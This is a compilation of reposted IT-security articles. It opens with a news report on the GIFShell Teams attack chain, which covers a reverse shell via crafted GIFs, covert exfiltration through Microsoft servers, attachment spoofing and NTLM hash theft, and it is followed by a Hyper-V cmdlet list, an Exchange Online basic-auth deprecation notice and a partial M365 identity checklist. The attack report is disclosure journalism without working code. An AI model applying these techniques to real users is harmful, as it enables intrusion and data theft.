The new attack chain was discovered by cybersecurity consultant and pentester Bobby Rauch, who found numerous vulnerabilities, or flaws, in Microsoft Teams that can be chained together for command execution, data exfiltration, security control bypasses, and phishing attacks.

The main component of this attack is called ‘GIFShell,’ which allows an attacker to create a reverse shell that delivers malicious commands via base64 encoded GIFs in Teams, and exfiltrates the output through GIFs retrieved by Microsoft’s own infrastructure.

To create this reverse shell, the attacker must first convince a user to install a malicious stager that executes commands, and uploads command output via a GIF url to a Microsoft Teams web hook. However, as we know, phishing attacks work well in infecting devices, Rauch came up with a novel phishing attack in Microsoft Teams to aid in this, which we describe in the next section.

GIFShell works by tricking a user into loading a malware executable called the “stager” on their device that will continuously scan the Microsoft Teams logs located at $HOME\AppData\Roaming\Microsoft\Teams\IndexedDB\https_teams.microsoft.com_0.indexeddb.leveldb\*.log.

**Microsoft Teams log folder**
*Source: BleepingComputer*

All received messages are saved to these logs and are readable by all Windows user groups, meaning any malware on the device can access them.

Once the stager is in place, a threat actor would create their own Microsoft Teams tenant and contact other Microsoft Teams users outside of their organization. Attackers can easily achieve this as Microsoft allows external communication by default in Microsoft Teams.

To initiate the attack, the threat actor can use Rauch’s GIFShell Python script to send a message to a Microsoft Teams user that contains a specially crafted GIF. This legitimate GIF image has been modified to include commands to execute on a target’s machine.

When the target receives the message, the message and the GIF will be stored in Microsoft Team’s logs, which the malicious stager monitors.

When the stager detects a message with a GIF, it will extract the base64 encoded commands and execute them on the device. The GIFShell PoC will then take the output of the executed command and convert it to base64 text.

This base64 text is used as the filename for a remote GIF embedded in a Microsoft Teams Survey Card that the stager submits to the attacker’s public Microsoft Teams webhook.

As Microsoft Teams renders flash cards for the user, Microsoft’s servers will connect back to the attacker’s server URL to retrieve the GIF, which is named using the base64 encoded output of the executed command.

The GIFShell server running on the attacker’s server will receive this request and automatically decode the filename allowing the attackers to see the output of the command run on the victim’s device, as shown below.

For example, a retrieved GIF file named ‘dGhlIHVzZXIgaXM6IA0KYm9iYnlyYXVjaDYyNzRcYm9iYnlyYXVJa0K.gif’ would decode to the output from the ‘whoami’ command executed on the infected device:

the user is: 
bobbyrauch6274\bobbyrauIkBáë

The threat actors can continue using the GIFShell server to send more GIFs, with further embedded commands to execute, and continue to receive the output when Microsoft attempts to retrieve the GIFs.

As these requests are made by the Microsoft website, urlp.asm.skype.com, used for regular Microsoft Teams communication, the traffic will be seen as legitimate and not detected by security software.

This allows the GIFShell attack to covertly exfiltrate data by mixing the output of their commands with legitimate Microsoft Teams network communication.

Even worse, as Microsoft Teams runs as a background process, it does not even need to be opened by the user to receive the attacker’s commands to execute.

The Microsoft Teams logs folder have also been found accessed by other programs, including business monitoring software, such as Veriato, and potentially malware.

Microsoft acknowledged the research but said it would not be fixed as no security boundaries were bypassed.

“For this case, 72412, while this is great research and the engineering team will endeavor to improve these areas over time, these all are post exploitation and rely on a target already being compromised,” Microsoft told Rauch in an email shared with BleepingComputer.

“No security boundary appears to be bypassed. The product team will review the issue for potential future design changes, but this would not be tracked by the security team.”

Abusing Microsoft teams for phishing attacks

As we previously said, the GIFShell attack requires the installation of an executable that executes commands received within the GIFs.

To aid in this, Rauch discovered Microsoft Teams flaws that allowed him to send malicious files to Teams users but spoof them to look as harmless images in phishing attacks.

“This research demonstrates how it is possible to send highly convincing phishing attachments to victims through Microsoft Teams, without any way for a user to pre-screen whether the linked attachment is malicious or not,” explains Rauch in his writeup on the phishing method.

As we previously said in our discussion about GIFShell, Microsoft Teams allows Microsoft Teams users to message users in other Tenants by default.

However, to prevent attackers from using Microsoft Teams in malware phishing attacks, Microsoft does not allow external users to send attachments to members of another tenant.

While playing with attachments in Microsoft Teams, Rauch discovered that when someone sends a file to another user in the same tenant, Microsoft generates a Sharepoint link that is embedded in a JSON POST request to the Teams endpoint.

This JSON message, though, can then be modified to include any download link an attacker wants, even external links. Even worse, when the JSON is sent to a user via Teams’ conversation endpoint, it can also be used to send attachments as an external user, bypassing Microsoft Teams’ security restrictions.

For example, the JSON below has been modified to show a file name of Christmas_Party_Photo.jpeg but actually delivers a remote Christmas_Party_Photo.jpeg………….exe executable.

**Microsoft Teams JSON to spoof an attachment**
*Source: Bobby Rauch*

When the attachment is rendered in Teams, it is displayed as Christmas_Party_Photo.jpeg, and when highlighting it, it will continue to show that name, as shown below.

**Spoofing a JPEG file**
*Source: Bobby Rauch*

However, when the user clicks on the link, the attachment will download the executable from the attacker’s server.

In addition to using this Microsoft Teams spoofing phishing attack to send malicious files to external users, attackers can also modify the JSON to use Windows URIs, such as ms-excel:, to automatically launch an application to retrieve a document.

Rauch says this would allow attackers to trick users into connecting to a remote network share, letting threat actors steal NTLM hashes, or local attackers perform an NTLM relay attack to elevate privileges.

“These allowed, potentially unsafe URI schemes, combined with the lack of permissions enforcement and attachment spoofing vulnerabilities, can allow for a One Click RCE via NTLM relay in Microsoft Teams,” Rauch explains in his report on the spoofing attack.

Microsoft not immediately fixing bugs

Rauch told BleepingComputer that he disclosed the flaws to Microsoft in May and June of 2022, and despite Microsoft saying they were valid issues, they decided not to fix them immediately.

When BleepingComputer contacted Microsoft about why the bugs were not fixed, we were not surprised by their response regarding the GIFShell attack technique, as it requires the device to already be compromised with malware.

“This type of phishing is important to be aware of and as always, we recommend that users practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers.
We’ve assessed the techniques reported by this researcher and have determined that the two mentioned do not meet the bar for an urgent security fix. We’re constantly looking at new ways to better resist phishing to help ensure customer security and may take action in a future release to help mitigate this technique.” – a Microsoft spokesperson.

However, we were surprised that Microsoft did not consider the ability of external attackers to bypass security controls and send attachments to another tenant as not something that should be immediately fixed.

Furthermore, not immediately fixing the ability to modify JSON attachment cards so that Microsoft Teams recipients could be tricked to download files from remote URLs was also surprising.

However, Microsoft has left the door open to resolving these issues, telling BleepingComputer that they may be serviced in future versions.

“Some lower severity vulnerabilities that don’t pose an immediate risk to customers are not prioritized for an immediate security update, but will be considered for the next version or release of Windows,” explained Microsoft in a statement to BleepingComputer.

Source :
https://www.bleepingcomputer.com/news/security/gifshell-attack-creates-reverse-shell-using-microsoft-teams-gifs/

PowerShell – Hyper-V Cmdlets

Check out: PowerShell Vault, PowerShell Category, Azure Cmdlets, SCCM Cmdlets, PowerShell Cmdlets, AD Cmdlets

Add-VMDvdDrive	Adds a DVD drive to a virtual machine.
Add-VMFibreChannelHba	Adds a virtual Fibre Channel host bus adapter to a virtual machine.
Add-VMGroupMember	Adds group members to a virtual machine group.
Add-VMHardDiskDrive	Adds a hard disk drive to a virtual machine.
Add-VMMigrationNetwork	Adds a network for virtual machine migration on one or more virtual machine hosts.
Add-VMNetworkAdapter	Adds a virtual network adapter to a virtual machine.
Add-VMNetworkAdapterAcl	Creates an ACL to apply to the traffic through a virtual machine network adapter.
Add-VMNetworkAdapterExtendedAcl	Creates an extended ACL for a virtual network adapter.
Add-VMRemoteFx3dVideoAdapter	Adds a RemoteFX video adapter in a virtual machine.
Add-VMScsiController	Adds a SCSI controller in a virtual machine.
Add-VMStoragePath	Adds a path to a storage resource pool.
Add-VMSwitch	Adds a virtual switch to an Ethernet resource pool.
Add-VMSwitchExtensionPortFeature	Adds a feature to a virtual network adapter.
Add-VMSwitchExtensionSwitchFeature	Adds a feature to a virtual switch.
Add-VMSwitchTeamMember	Adds members to a virtual switch team.
Add-VmNetworkAdapterRoutingDomainMapping	Adds a routing domain and virtual subnets to a virtual network adapter.
Checkpoint-VM	Creates a checkpoint of a virtual machine.
Compare-VM	Compares a virtual machine and a virtual machine host for compatibility, returning a compatibility report.
Complete-VMFailover	Completes a virtual machine’s failover process on the Replica server.
Connect-VMNetworkAdapter	Connects a virtual network adapter to a virtual switch.
Connect-VMSan	Associates a host bus adapter with a virtual storage area network (SAN).
Convert-VHD	Converts the format, version type, and block size of a virtual hard disk file.
Copy-VMFile	Copies a file to a virtual machine.
Debug-VM	Debugs a virtual machine.
Disable-VMConsoleSupport	Disables keyboard, video, and mouse for virtual machines.
Disable-VMEventing	Disables virtual machine eventing.
Disable-VMIntegrationService	Disables an integration service on a virtual machine.
Disable-VMMigration	Disables migration on one or more virtual machine hosts.
Disable-VMRemoteFXPhysicalVideoAdapter	Disables one or more RemoteFX physical video adapters from use with RemoteFX-enabled virtual machines.
Disable-VMResourceMetering	Disables collection of resource utilization data for a virtual machine or resource pool.
Disable-VMSwitchExtension	Disables one or more extensions on one or more virtual switches.
Disable-VMTPM	Disables TPM functionality on a virtual machine.
Disconnect-VMNetworkAdapter	Disconnects a virtual network adapter from a virtual switch or Ethernet resource pool.
Disconnect-VMSan	Removes a host bus adapter from a virtual storage area network (SAN).
Dismount-VHD	Dismounts a virtual hard disk.
Enable-VMConsoleSupport	Enables keyboard, video, and mouse for virtual machines.
Enable-VMEventing	Enables virtual machine eventing.
Enable-VMIntegrationService	Enables an integration service on a virtual machine.
Enable-VMMigration	Enables migration on one or more virtual machine hosts.
Enable-VMRemoteFXPhysicalVideoAdapter	Enables one or more RemoteFX physical video adapters for use with RemoteFX-enabled virtual machines.
Enable-VMReplication	Enables replication of a virtual machine.
Enable-VMResourceMetering	Collects resource utilization data for a virtual machine or resource pool.
Enable-VMSwitchExtension	Enables one or more extensions on one or more switches.
Enable-VMTPM	Enables TPM functionality on a virtual machine.
Export-VM	Exports a virtual machine to disk.
Export-VMSnapshot	Exports a virtual machine checkpoint to disk.
Get-VHD	Gets the virtual hard disk object associated with a virtual hard disk.
Get-VHDSet	Gets information about a VHD set.
Get-VHDSnapshot	Gets information about a checkpoint in a VHD set.
Get-VM	Gets the virtual machines from one or more Hyper-V hosts.
Get-VMBios	Gets the BIOS of a virtual machine or snapshot.
Get-VMComPort	Gets the COM ports of a virtual machine or snapshot.
Get-VMConnectAccess	Gets entries showing users and the virtual machines to which they can connect on one or more Hyper-V hosts.
Get-VMDvdDrive	Gets the DVD drives attached to a virtual machine or snapshot.
Get-VMFibreChannelHba	Gets the Fibre Channel host bus adapters associated with one or more virtual machines.
Get-VMFirmware	Gets the firmware configuration of a virtual machine.
Get-VMFloppyDiskDrive	Gets the floppy disk drives of a virtual machine or snapshot.
Get-VMGroup	Gets virtual machine groups.
Get-VMHardDiskDrive	Gets the virtual hard disk drives attached to one or more virtual machines.
Get-VMHost	Gets a Hyper-V host.
Get-VMHostCluster	Gets virtual machine host clusters.
Get-VMHostNumaNode	Gets the NUMA topology of a virtual machine host.
Get-VMHostNumaNodeStatus	Gets the status of the virtual machines on the non-uniform memory access (NUMA) nodes of a virtual machine host or hosts.
Get-VMHostSupportedVersion	Returns a list of virtual machine configuration versions that are supported on a host.
Get-VMIdeController	Gets the IDE controllers of a virtual machine or snapshot.
Get-VMIntegrationService	Gets the integration services of a virtual machine or snapshot.
Get-VMKeyProtector	Retrieves a key protector for a virtual machine.
Get-VMMemory	Gets the memory of a virtual machine or snapshot.
Get-VMMigrationNetwork	Gets the networks added for migration to one or more virtual machine hosts.
Get-VMNetworkAdapter	Gets the virtual network adapters of a virtual machine, snapshot, management operating system, or of a virtual machine and management operating system.
Get-VMNetworkAdapterAcl	Gets the ACLs configured for a virtual machine network adapter.
Get-VMNetworkAdapterExtendedAcl	Gets extended ACLs configured for a virtual network adapter.
Get-VMNetworkAdapterFailoverConfiguration	Gets the IP address of a virtual network adapter configured to be used when a virtual machine fails over.
Get-VMNetworkAdapterRoutingDomainMapping	Gets members of a routing domain.
Get-VMNetworkAdapterTeamMapping
Get-VMNetworkAdapterVlan	Gets the virtual LAN settings configured on a virtual network adapter.
Get-VMProcessor	Gets the processor of a virtual machine or snapshot.
Get-VMRemoteFXPhysicalVideoAdapter	Gets the RemoteFX physical graphics adapters on one or more Hyper-V hosts.
Get-VMRemoteFx3dVideoAdapter	Gets the RemoteFX video adapter of a virtual machine or snapshot.
Get-VMReplication	Gets the replication settings for a virtual machine.
Get-VMReplicationAuthorizationEntry	Gets the authorization entries of a Replica server.
Get-VMReplicationServer	Gets the replication and authentication settings of a Replica server.
Get-VMResourcePool	Gets the resource pools on one or more virtual machine hosts.
Get-VMSan	Gets the available virtual machine storage area networks on a Hyper-V host or hosts.
Get-VMScsiController	Gets the SCSI controllers of a virtual machine or snapshot.
Get-VMSecurity	Gets security information about a virtual machine.
Get-VMSnapshot	Gets the checkpoints associated with a virtual machine or checkpoint.
Get-VMStoragePath	Gets the storage paths in a storage resource pool.
Get-VMSwitch	Gets virtual switches from one or more virtual Hyper-V hosts.
Get-VMSwitchExtension	Gets the extensions on one or more virtual switches.
Get-VMSwitchExtensionPortData	Retrieves the status of a virtual switch extension feature applied to a virtual network adapter.
Get-VMSwitchExtensionPortFeature	Gets the features configured on a virtual network adapter.
Get-VMSwitchExtensionSwitchData	Gets the status of a virtual switch extension feature applied on a virtual switch.
Get-VMSwitchExtensionSwitchFeature	Gets the features configured on a virtual switch.
Get-VMSwitchTeam	Gets virtual switch teams from Hyper-V hosts.
Get-VMSystemSwitchExtension	Gets the switch extensions installed on a virtual machine host.
Get-VMSystemSwitchExtensionPortFeature	Gets the port-level features supported by virtual switch extensions on one or more Hyper-V hosts.
Get-VMSystemSwitchExtensionSwitchFeature	Gets the switch-level features on one or more Hyper-V hosts.
Get-VMVideo	Gets video settings for virtual machines.
Get-VmNetworkAdapterIsolation	Gets isolation settings for a virtual network adapter.
Grant-VMConnectAccess	Grants a user or users access to connect to a virtual machine or machines.
Import-VM	Imports a virtual machine from a file.
Import-VMInitialReplication	Imports initial replication files for a Replica virtual machine to complete the initial replication when using external media as the source.
Measure-VM	Reports resource utilization data for one or more virtual machines.
Measure-VMReplication	Gets replication statistics and information associated with a virtual machine.
Measure-VMResourcePool	Reports resource utilization data for one or more resource pools.
Merge-VHD	Merges virtual hard disks.
Mount-VHD	Mounts one or more virtual hard disks.
Move-VM	Moves a virtual machine to a new Hyper-V host.
Move-VMStorage	Moves the storage of a virtual machine.
New-VFD	Creates a virtual floppy disk.
New-VHD	Creates one or more new virtual hard disks.
New-VM	Creates a new virtual machine.
New-VMGroup	Creates a virtual machine group.
New-VMReplicationAuthorizationEntry	Creates a new authorization entry that allows one or more primary servers to replicate data to a specified Replica server.
New-VMResourcePool	Creates a resource pool.
New-VMSan	Creates a new virtual storage area network (SAN) on a Hyper-V host.
New-VMSwitch	Creates a new virtual switch on one or more virtual machine hosts.
Optimize-VHD	Optimizes the allocation of space used by virtual hard disk files, except for fixed virtual hard disks.
Optimize-VHDSet	Optimizes VHD set files.
Remove-VHDSnapshot	Removes a checkpoint from a VHD set file.
Remove-VM	Deletes a virtual machine.
Remove-VMDvdDrive	Deletes a DVD drive from a virtual machine.
Remove-VMFibreChannelHba	Removes a Fibre Channel host bus adapter from a virtual machine.
Remove-VMGroup	Removes a virtual machine group.
Remove-VMGroupMember	Removes members from a virtual machine group.
Remove-VMHardDiskDrive	Deletes a hard disk drive from a virtual machine.
Remove-VMMigrationNetwork	Removes a network from use with migration.
Remove-VMNetworkAdapter	Removes one or more virtual network adapters from a virtual machine.
Remove-VMNetworkAdapterAcl	Removes an ACL applied to the traffic through a virtual network adapter.
Remove-VMNetworkAdapterExtendedAcl	Removes an extended ACL for a virtual network adapter.
Remove-VMNetworkAdapterRoutingDomainMapping	Removes a routing domain from a virtual network adapter.
Remove-VMNetworkAdapterTeamMapping
Remove-VMRemoteFx3dVideoAdapter	Removes a RemoteFX 3D video adapter from a virtual machine.
Remove-VMReplication	Removes the replication relationship of a virtual machine.
Remove-VMReplicationAuthorizationEntry	Removes an authorization entry from a Replica server.
Remove-VMResourcePool	Deletes a resource pool from one or more virtual machine hosts.
Remove-VMSan	Removes a virtual storage area network (SAN) from a Hyper-V host.
Remove-VMSavedState	Deletes the saved state of a saved virtual machine.
Remove-VMScsiController	Removes a SCSI controller from a virtual machine.
Remove-VMSnapshot	Deletes a virtual machine checkpoint.
Remove-VMStoragePath	Removes a path from a storage resource pool.
Remove-VMSwitch	Deletes a virtual switch.
Remove-VMSwitchExtensionPortFeature	Removes a feature from a virtual network adapter.
Remove-VMSwitchExtensionSwitchFeature	Removes a feature from a virtual switch.
Remove-VMSwitchTeamMember	Removes a member from a virtual machine switch team.
Rename-VM	Renames a virtual machine.
Rename-VMGroup	Renames virtual machine groups.
Rename-VMNetworkAdapter	Renames a virtual network adapter on a virtual machine or on the management operating system.
Rename-VMResourcePool	Renames a resource pool on one or more Hyper-V hosts.
Rename-VMSan	Renames a virtual storage area network (SAN).
Rename-VMSnapshot	Renames a virtual machine checkpoint.
Rename-VMSwitch	Renames a virtual switch.
Repair-VM	Repairs one or more virtual machines.
Reset-VMReplicationStatistics	Resets the replication statistics of a virtual machine.
Reset-VMResourceMetering	Resets the resource utilization data collected by Hyper-V resource metering.
Resize-VHD	Resizes a virtual hard disk.
Restart-VM	Restarts a virtual machine.
Restore-VMSnapshot	Restores a virtual machine checkpoint.
Resume-VM	Resumes a suspended (paused) virtual machine.
Resume-VMReplication	Resumes a virtual machine replication that is in a state of Paused, Error, Resynchronization Required, or Suspended.
Revoke-VMConnectAccess	Revokes access for one or more users to connect to a one or more virtual machines.
Save-VM	Saves a virtual machine.
Set-VHD	Sets properties associated with a virtual hard disk.
Set-VM	Configures a virtual machine.
Set-VMBios	Configures the BIOS of a Generation 1 virtual machine.
Set-VMComPort	Configures the COM port of a virtual machine.
Set-VMDvdDrive	Configures a virtual DVD drive.
Set-VMFibreChannelHba	Configures a Fibre Channel host bus adapter on a virtual machine.
Set-VMFirmware	Sets the firmware configuration of a virtual machine.
Set-VMFloppyDiskDrive	Configures a virtual floppy disk drive.
Set-VMHardDiskDrive	Configures a virtual hard disk.
Set-VMHost	Configures a Hyper-V host.
Set-VMHostCluster	Configures a virtual machine host cluster.
Set-VMKeyProtector	Configures a key protector for a virtual machine.
Set-VMMemory	Configures the memory of a virtual machine.
Set-VMMigrationNetwork	Sets the subnet, subnet mask, and/or priority of a migration network.
Set-VMNetworkAdapter	Configures features of the virtual network adapter in a virtual machine or the management operating system.
Set-VMNetworkAdapterFailoverConfiguration	Configures the IP address of a virtual network adapter to be used when a virtual machine fails over.
Set-VMNetworkAdapterTeamMapping
Set-VMNetworkAdapterVlan	Configures the virtual LAN settings for the traffic through a virtual network adapter.
Set-VMProcessor	Configures one or more processors of a virtual machine.
Set-VMRemoteFx3dVideoAdapter	Configures the RemoteFX 3D video adapter of a virtual machine.
Set-VMReplication	Modifies the replication settings of a virtual machine.
Set-VMReplicationAuthorizationEntry	Modifies an authorization entry on a Replica server.
Set-VMReplicationServer	Configures a host as a Replica server.
Set-VMResourcePool	Sets the parent resource pool for a selected resource pool.
Set-VMSan	Configures a virtual storage area network (SAN) on one or more Hyper-V hosts.
Set-VMSecurity	Configures security settings for a virtual machine.
Set-VMSecurityPolicy	Configures the security policy for a virtual machine.
Set-VMSwitch	Configures a virtual switch.
Set-VMSwitchExtensionPortFeature	Configures a feature on a virtual network adapter.
Set-VMSwitchExtensionSwitchFeature	Configures a feature on a virtual switch.
Set-VMSwitchTeam	Configures a virtual switch team.
Set-VMVideo	Configures video settings for virtual machines.
Set-VmNetworkAdapterIsolation	Modifies isolation settings for a virtual network adapter.
Set-VmNetworkAdapterRoutingDomainMapping	Sets virtual subnets on a routing domain.
Start-VM	Starts a virtual machine.
Start-VMFailover	Starts failover on a virtual machine.
Start-VMInitialReplication	Starts replication of a virtual machine.
Start-VMTrace	Starts tracing to a file.
Stop-VM	Shuts down, turns off, or saves a virtual machine.
Stop-VMFailover	Stops failover of a virtual machine.
Stop-VMInitialReplication	Stops an ongoing initial replication.
Stop-VMReplication	Cancels an ongoing virtual machine resynchronization.
Stop-VMTrace	Stops tracing to file.
Suspend-VM	Suspends, or pauses, a virtual machine.
Suspend-VMReplication	Suspends replication of a virtual machine.
Test-VHD	Tests a virtual hard disk for any problems that would make it unusable.
Test-VMNetworkAdapter	Tests connectivity between virtual machines.
Test-VMReplicationConnection	Tests the connection between a primary server and a Replica server.
Update-VMVersion	Updates the version of virtual machines.

Source :
https://eddiejackson.net/wp/?page_id=26483

Basic Authentication Deprecation in Exchange Online – September 2022 Update

One month from today, we’re going to start to turn off basic auth for specific protocols in Exchange Online for customers who use them.

Since our first announcement nearly three years ago, we’ve seen millions of users move away from basic auth, and we’ve disabled it in millions of tenants to proactively protect them.

We’re not done yet though, and unfortunately usage isn’t yet at zero. Despite that, we will start to turn off basic auth for several protocols for tenants not previously disabled.

Starting October 1^st, we will start to randomly select tenants and disable basic authentication access for MAPI, RPC, Offline Address Book (OAB), Exchange Web Services (EWS), POP, IMAP, Exchange ActiveSync (EAS), and Remote PowerShell. We will post a message to the Message Center 7 days prior, and we will post Service Health Dashboard notifications to each tenant on the day of the change.

We will not be disabling or changing any settings for SMTP AUTH.

If you have removed your dependency on basic auth, this will not affect your tenant or users. If you have not (or are not sure), check the Message Center for the latest data contained in the monthly usage reports we have been sending monthly since October 2021. The data for August 2022 will be sent within the first few days of September.

What If You Are Not Ready for This Change?

We recognize that unfortunately there are still many tenants unprepared for this change. Despite multiple blog posts, Message Center posts, interruptions of service, and coverage via tweets, videos, conference presentations and more, some customers are still unaware this change is coming. There are also many customers aware of the deadline who simply haven’t done the necessary work to avoid an outage.

Our goal with this effort has only ever been to protect your data and accounts from the increasing number of attacks we see that are leveraging basic auth.

However, we understand that email is a mission-critical service for many of our customers and turning off basic auth for many of them could potentially be very impactful.

One-Time Re-Enablement

Today we are announcing an update to our plan to offer customers who are unaware or are not ready for this change.

When we turn off basic auth after October 1^st, all customers will be able to use the self-service diagnostic to re-enable basic auth for any protocols they need, once per protocol. Details on this process are below.

Once this diagnostic is run, basic auth will be re-enabled for those protocol(s). Selected protocol(s) will stay enabled for basic auth use until end of December 2022. During the first week of calendar year 2023, those protocols will be disabled for basic auth use permanently, and there will be no possibility of using basic auth after that.

Avoiding Disruption

If you already know you need more time and wish to avoid the disruption of having basic auth disabled you can run the diagnostics during the month of September, and when October comes, we will not disable basic for protocol(s) you specify. We will disable basic for any non-opted-out protocols, but you will be able to re-enable them (until the end of the year) by following the steps below if you later decide you need those too.

In other words – if you do not want basic for a specific protocol or protocols disabled in October, you can use the same self-service diagnostic in the month of September. Details on this process below.

Diagnostic Options

Thousands of customers have already used the self-service diagnostic we discussed in earlier blog posts (here and here) to re-enable basic auth for a protocol that had been turned off, or to tell us not to include them in our proactive protection expansion program. We’re using this same diagnostic again, but the workflow is changing a little.

Today, we have archived all prior re-enable and opt-out requests. If you have previously opted out or re-enabled basic for some protocol, you’ll need to follow the steps below during the month of September to indicate you want us to leave something enabled for basic auth after Oct 1.

To invoke the self-service diagnostic, you can go directly to the basic auth self-help diagnostic by simply clicking on this button (it’ll bring up the diagnostic in the Microsoft 365 admin center if you’re a tenant Global Admin):

thumbnail image 1 of blog post titled
Basic Authentication Deprecation in Exchange Online – September 2022 Update

Or you can open the Microsoft 365 admin center and click the green Help & support button in the lower right-hand corner of the screen.

thumbnail image 2 of blog post titled
Basic Authentication Deprecation in Exchange Online – September 2022 Update

thumbnail image 3 of blog post titled
Basic Authentication Deprecation in Exchange Online – September 2022 Update

When you click the button, you enter our self-help system. Here you can enter the phrase “Diag: Enable Basic Auth in EXO”

Customers with tenants in the Government Community Cloud (GCC) are unable to use the self-service diagnostic covered here. Those tenants may opt out by following the process contained in the Message Center post sent to their tenant today. If GCC customers need to re-enable a protocol following the Oct 1^st deadline they will need to open a support ticket.

Opting Out

During the month of September 2022, the diagnostic will offer only the option to opt-out. By submitting your opt-out request during September, you are telling us that you do not want us to disable basic for a protocol or protocols during October. Please understand we will be disabling basic auth for all tenants permanently in January 2023, regardless of their opt-out status.

The diagnostic will show a version of the dialog below, and you can re-run it for multiple protocols. It might look a bit different if some protocols have already been disabled. Note too that protocols are not removed from the list as you opt-out but rest assured (unless you receive an error) we will receive the request.

thumbnail image 4 of blog post titled
Basic Authentication Deprecation in Exchange Online – September 2022 Update

Re-Enabling Basic for protocols

Starting October 1, the diagnostic will only allow you to re-enable basic auth for a protocol that it was disabled for.

If you did not opt-out during September, and we disabled basic for a protocol you later realize you need, you can use this to re-enable it.

thumbnail image 5 of blog post titled
Basic Authentication Deprecation in Exchange Online – September 2022 Update

Within an hour (usually much sooner) after you run the diagnostics and ask us to re-enable basic for a protocol, basic auth will start to work again.

At this point, we have to remind you that by re-enabling basic for a protocol, you are leaving your users and data vulnerable to security risks, and that we have customers suffering from basic auth-based attacks every single day (but you know that already).

Starting January 1, 2023, the self-serve diagnostic will no longer be available, and basic auth will soon thereafter be disabled for all protocols.

Summary of timelines and actions

Please see the following flow chart to help illustrate the changes and actions that you might need to take:

thumbnail image 6 of blog post titled
Basic Authentication Deprecation in Exchange Online – September 2022 Update

Blocking Basic Authentication Yourself

If you re-enable basic for a protocol because you need some extra time and then afterward no longer need basic auth you can block it yourself instead of waiting for us to do it in January 2023. The quickest and most effective way to do this is to use Authentication Policies which block basic auth connections at the first point of contact to Exchange Online.

Just go into the Microsoft 365 admin center, navigate to Settings, Org Settings, Modern Authentication and uncheck the boxes to block basic for all protocols you no longer need (these checkboxes will do nothing once we block basic for a protocol permanently, and we’ll remove them some time after January 2023).

thumbnail image 7 of blog post titled
Basic Authentication Deprecation in Exchange Online – September 2022 Update

Reporting Web Service Endpoint

For those of you using the Reporting Web Service REST endpoint to get access to Message Tracking Logs and more, we’re also announcing today that this service will continue to have basic auth enabled until Dec 31^st for all customers, no opt-out or re-enablement is required. And, we’re pleased to be able to provide the long-awaited guidance for this too right here.

EOP/SCC PowerShell

Basic authentication will remain enabled until Dec 31^st, 2022. Customers need to migrate to certificate based authentication. Follow the Instructions here: App-only authentication

One Other Basic Authentication Related Update

We’re adding a new capability to Microsoft 365 to help our customers avoid the risks posed by basic authentication. This new feature changes the default behavior of Office applications to block sign-in prompts using basic authentication. With this change, if users try to open Office files on servers that only use basic authentication, they won’t see any basic authentication sign-in prompts. Instead, they’ll see a message that the file has been blocked because it uses a sign-in method that may be insecure.

You can read more about this great new feature here: Basic authentication sign-in prompts are blocked by default in Microsoft 365 Apps.

Office Team is looking for customers to opt-in to their Private Preview Program for this feature. Please send them an email if you are interested in signing up: basicauthdeprmailer@microsoft.com.

Summary

This effort has taken three years from initial communication until now, and even that has not been enough time to ensure that all customers know about this change and take all necessary steps. IT and change can be hard, and the pandemic changed priorities for many of us, but everyone wants the same thing: better security for their users and data.

Our customers are important to us, and we do not want to see them breached, or disrupted. It’s a fine balance but we hope this final option will allow the remaining customers using Basic auth to finally get rid of it.

The end of 2022 will see us collectively reach that goal, to Improve Security – Together.

The Exchange Team

Source :
https://techcommunity.microsoft.com/t5/exchange-team-blog/basic-authentication-deprecation-in-exchange-online-september/ba-p/3609437

Use this Identity Checklist to secure your M365 tenant

Securing a Microsoft 365 tenant must start with identity.

Protecting identities is a fundamental part of Zero Trust and it’s the first “target” that most attackers look for. We used to say that attackers hack their way in, now we say they log in, using bought, found or stolen/phished credentials. This article will show you why MFA is so important and how to implement advanced security features in Azure AD such as PIM, Password protection, Conditional Access policies (also a strong part of Zero Trust), auditing and more.

Below is the first chapter from our free Microsoft 365 Security Checklist eBook. The Microsoft 365 Security Checklist shows you all the security settings and configurations you need to know for each M365 license to properly secure your environment. Download the full eBook and checklist spreadsheet.

Multi-Factor Authentication

It should be no surprise that we start with identity, it’s the new security perimeter or the new firewall and having a strong identity equals strong security. The first step to take here is implementing Multi Factor Authentication (MFA). It’s free for all Office / Microsoft tenants. If you want to use Conditional Access (CA) to enforce it (rather than just enabling users “in bulk”), you need Azure AD Premium P1+ licensing. A username and a simple password are no longer adequate (it never was, we just never had a simple, affordable, easy to use alternative) to protect your business.

Hand-in-hand with MFA you need user training. If your business is relying on users doing the right thing when they get the prompt on their phone – they MUST also know that if they get a prompt when they’re NOT logging in anywhere, they must click Block / No / Reject.

To enable MFA on a per-user basis, go to aad.portal.azure.com, login as an administrator, click Azure Active Directory – Security – MFA and click on the blue link “Additional cloud-based MFA settings”.

Additional MFA settings

There are two parts (tabs) on this page, “service settings” where you should disable app passwords (a workaround for legacy clients that don’t support MFA, shouldn’t be necessary in 2022), add trusted public IP addresses (so that users aren’t prompted when they’re in the corporate office – we and Microsoft recommend not using this setting), disabling Call and Text message to phone and remember MFA on trusted devices setting (1-365 days), Microsoft recommends either using CA policies to manage Sign-In frequency or setting this to 90 days. Phone call / text message MFA are not strong authentication methods and should not be used unless there’s no other choice.

On the user’s tab you can enable MFA for individual users or click bulk update and upload a CSV file with user accounts.

If you have AAD Premium P1, it’s better to use a CA policy to enforce MFA, it’s more flexible and the MFA settings page will eventually be retired.

Enforcing MFA with a Conditional Access Policy

A few words of caution, enabling MFA for all your administrators is a given today. Seriously, if you aren’t requiring every privileged account to use MFA (or 2FA / passwordless, see below), stop reading and go and do that right now. Yes, it’s an extra step and yes, you’ll get push back but there’s just no excuse – it’s simply unprofessional and you don’t belong in IT if you’re not using it. For what it is worth, I’ve been using Azure MFA for over seven years and require it for administrators at my clients – no exceptions.

Enabling MFA for all users is also incredibly important but takes some planning. You may have some users who refuse to run the Microsoft Authenticator app on their personal phone – ask for it to be put in their hiring contract. You need to train them as to why MFA is being deployed, what to do, both for authentic logins and malicious ones. Furthermore, you need to have a smooth process for enrolling new users and offboarding people who are leaving.

You should also strongly consider creating separate (cloud only) accounts for administrators. They don’t require a license and it separates the day-to-day work of a person who only performs administrative actions in your tenant occasionally (or use PIM, Chapter 10).

MFA protects you against 99.9% of identity-based attacks but it’s not un-phishable. Stronger alternatives include biometrics such as Windows Hello for Business (WHFB) and 2FA hardware keys which bring you closer to the ultimate in identity security: passwordless.

Legacy Authentication

